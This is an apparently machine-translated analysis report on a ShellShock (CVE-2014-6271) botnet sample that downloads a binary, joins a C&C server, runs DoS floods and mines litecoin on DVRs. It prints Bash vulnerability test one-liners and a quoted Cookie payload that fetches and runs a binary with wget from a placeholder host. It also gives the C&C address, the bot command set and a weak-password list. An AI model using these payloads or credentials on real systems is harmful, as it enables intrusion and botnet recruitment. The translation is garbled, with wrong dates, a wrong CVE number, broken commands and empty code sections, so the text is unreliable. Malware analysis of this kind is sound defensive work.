ShellShock vulnerability Sample Analysis Report

ShellShock vulnerability Sample Analysis Report

 

I. Introduction to vulnerability events

1. Vulnerability Information

● Release time: 48 minutes 04 seconds ● cve id: CVE-2014-6271 ● affected version:

 

2. Vulnerability Overview

Bash (GNU Bourne-Again Shell)It is the default shell for most Linux systems and Mac OS X v10.4. It can run on most Unix-style operating systems and even be transplanted to the Cygwin System on Microsoft Windows, to implement the POSIX Virtual Interface for windows.

Bash is widely used, which means that at least 1.5 million of Hosts around the world will be affected, and Android and apple in the Linux/Unix world will not be spared.

The ShellShock severity is defined as 10 (highest), and The OpenSSL (heartbleed) vulnerability in April this year is only 5!

3. Vulnerability causes:

Bash 4.3 and earlier versions have security vulnerabilities when processing some constructed environment variables. Adding additional strings to the function definitions in the environment variable value triggers this vulnerability, attackers can exploit this vulnerability to change or bypass environmental restrictions to execute arbitrary shell commands and even completely control the target system.

The environment variables used by bash affected by this vulnerability are called by function names and defined by environment variables starting. When dealing with such "function environment variables", the end is not ended with "}" at the end of the function, but the subsequent shell command is always executed.

4. Vulnerability Testing:

(1 ). CVE-2014-6271 test method: env x = '() {:;}; echo vulnerable' bash-c "echo this is a test" (2 ). CVE-2014-7169 Test method: (can still bypass after CVE-2014-6271 Patch Update) env-I X = '; () {(a) => \ 'bash-C' echo date'; cat echo

5. Solution

Please pay attention to the security patch updates on the official website (1 ). for the RedHat and CentOS Liunx Release versions, run: yum-y update bash (2 ). for the Debian Liunx release version, run: sudo apt-get update & sudo apt-get install -- only-upgrade bash

Ii. Sample Overview

● Sample source:

Since a Linux enthusiast in France published a BASH Vulnerability (CVE-2014-6721) in September 24, 2014, today the network has been using this vulnerability virus sample, we caught this vulnerability sample today, and carried out an emergency Analysis

● File information:

File Name: nginx

File Size: 525KB

MD5: 5924bcc045bb7039f55c6ce29234e29a

 

● Behavior Overview:

This vulnerability sample uses the Bash vulnerability to spread and spread, and uses the Linux Shell Command wget to download and execute the sample. After the sample is executed, system-related information (CPU, network configuration and other information), and then connect the sample to your server. By receiving commands from the server, you can remotely control the infected machine, and then create a botnet for flood attacks, and intrude into a Chinese manufacturer. After the intrusion, it is mainly for the exploitation of litecoin.

Iii. Detailed sample analysis

1. Sample Propagation Method

The sample uses the Bash vulnerability for propagation. The vulnerability can be exploited only by a few simple lines of commands, which undoubtedly brings great convenience to the caller. The Code is as follows:

 

The sample is downloaded and executed through wget. The vulnerability command is as follows:

Cookie, (). {.:;.};. wget/tmp/besh http://x.x.x/nginx; chmod.777/tmp/besh;

2. Sample Behavior Analysis

(1). Obtain computer-related information

After the sample is started, it first obtains information about the computer, such as CPU and network configuration.

 

(2). Connect the sample to your server (89.238.150.154: 5)

The strace is appended to the created sub-process sample to monitor its behavior as follows:

 

But the server of C & C has crashed.

(3) If the connection to the Server succeeds, remotely control the infected machine according to the commands sent from the server. The command set is as follows:

PING GETLOCALIP SCANNER HOLD (DoS Flood) JUNK (DoS Flood) UDP (DoS Flood) TCP (DoS Flood) KILLATTK LOLNOGTFO

● PING command:

 

Similar to the heartbeat packet, test whether the client server is successfully connected

● GETLOCALIP

 

Send the local IP address to the target server

● Failover

It is mainly used to parse characters through Busybox, so as to set the scanning attack target, and then scan the target DVR device through DVR detection to check whether there is a DVR vulnerability and initiate an attack.

 

We use busybox to parse the string to obtain

 

However, in the sample, we found that:

 

The DVR defender mainly tests whether the DVR vulnerability exists. If the vulnerability exists, try to connect the DVR through a weak password such as "root" and "12345". If the connection is successful, then execute ps to try to find "cmd. so "process, which is mainly related to litecoin miners.

Therefore, we can use this method to dig for litecoin.

Weak Password table in the program

root admin user login guest toor changeme 1234 12345 123456 default pass password

● HOLD (Dos Flood)

 

Carries out a Hold flood attack on the target server. By receiving server data packets, it specifies the number of seconds for the attack and returns the attack time to the server.

● JUNK (DoS Flood)

 

Conduct JUNK flood attacks on target servers

● UDP (DoS Flood)

 

UDP flood attacks on target servers

● TCP (DoS Flood)

 

Launch TCP flood attacks on the target server

● KILLATTK

 

Kill the specified process by calling the kill system by receiving the list of processes sent from the server.

● LOLNOGTFO

 

Invalid server packet instruction

Iii. Background Vulnerability Detection

After the vulnerability outbreak, we performed a statistical analysis on related websites nationwide in the background. We found that the cgi vulnerability exists on the NAS device management page of a company. By checking the website page, found that the device is similar to "TS-119P", device names are TS-XX.

Note: NAS is a network storage device. Many routers now support this function. If this device has a vulnerability, the resources in the device may be stolen. XXX will reproduce

For this reason, we set up a background page to detect the website and check whether there is a Bash vulnerability.

 

The detection URL is as follows:

Http://fish.ijinshan.com/cgibincheck

 

If no special statement is stated in the text, please indicate the source: FreebuF. COM